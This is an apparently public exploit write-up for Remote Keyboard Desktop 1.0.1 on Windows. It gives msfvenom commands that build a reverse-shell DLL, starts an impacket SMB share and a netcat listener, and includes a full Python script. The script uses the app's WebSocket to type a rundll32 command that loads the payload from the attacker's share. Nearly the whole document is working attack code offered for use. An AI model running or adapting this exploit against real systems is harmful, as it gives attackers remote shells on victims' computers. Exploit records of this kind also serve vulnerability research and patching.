# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) # Date: 05/17/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://remotecontrolio.web.app/ # Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare # Version: 1.0.1 # Tested on: Windows 10 Pro Build 19045 # Start Remote Keyboard Desktop on your windows # Preparing: # # 1. Generating payload (dll/exe): # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll # 2. Start smb server: impacket-smbserver SHARE . -smb2support # 3. nc -lnvp 8080 # 4. python exploit.py ##### #!/usr/bin/env python3 import websocket import json import time target = "192.168.8.105" lhost = "192.168.8.101" WS_URL = f"ws://{target}:8080/" payload = "shell2.dll" # payload dll/exe filename debug = False HEADER_LIST = [ "User-Agent: Dart/3.7 (dart:io)", f"Origin: http://{target}:8080", "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits" ] #SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll based special_mapping = { ' ': ("SPACE", False), '/': ("NUMPAD_DIVIDE", False), '\\': ("\\", False), '.': ("NUMPAD_DECIMAL", False), ',': (",", False), } def send_key_event(ws, key, key_down): event = {"command": "keyboard_event", "data": {"key": key, "keyDown": key_down, "capsLock": False}} ws.send(json.dumps(event)) def send_text(ws, text, delay=0.05): shift_pressed = False for ch in text: if ch in special_mapping: key_name, need_shift = special_mapping[ch] elif ch.isalpha(): need_shift = ch.isupper() key_name = ch.upper() elif ch.isdigit(): key_name = ch need_shift = False else: raise ValueError(f"No key mapping for character: {ch!r}") if need_shift and not shift_pressed: send_key_event(ws, "SHIFT", True) shift_pressed = True elif not need_shift and shift_pressed: send_key_event(ws, "SHIFT", False) shift_pressed = False send_key_event(ws, key_name, True) send_key_event(ws, key_name, False) time.sleep(delay) if shift_pressed: send_key_event(ws, "SHIFT", False) def send_key(ws, keys, delay=0.05): for key in keys: send_key_event(ws, key, True) time.sleep(delay) for key in reversed(keys): send_key_event(ws, key, False) def on_open(ws): print ("Let's start!") send_key(ws, ["LEFT_WINDOWS", "R"]) time.sleep(0.5) send_text(ws, SMB_PATH) send_key(ws, ["RETURN"]) print ("Executing...") time.sleep(1.2) print("Check your listener!") if debug: print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m ") ws.close() def on_message(ws, message): if debug: print("[=] Received:", message) def on_error(ws, error): if debug: print("[!] Error:", error) def on_close(ws, code, reason): if debug: print(f"[x] Closed: {code} - {reason}") if __name__ == "__main__": websocket.enableTrace(debug) ws = websocket.WebSocketApp( WS_URL, header=HEADER_LIST, on_open=on_open, on_message=on_message, on_error=on_error, on_close=on_close ) ws.run_forever()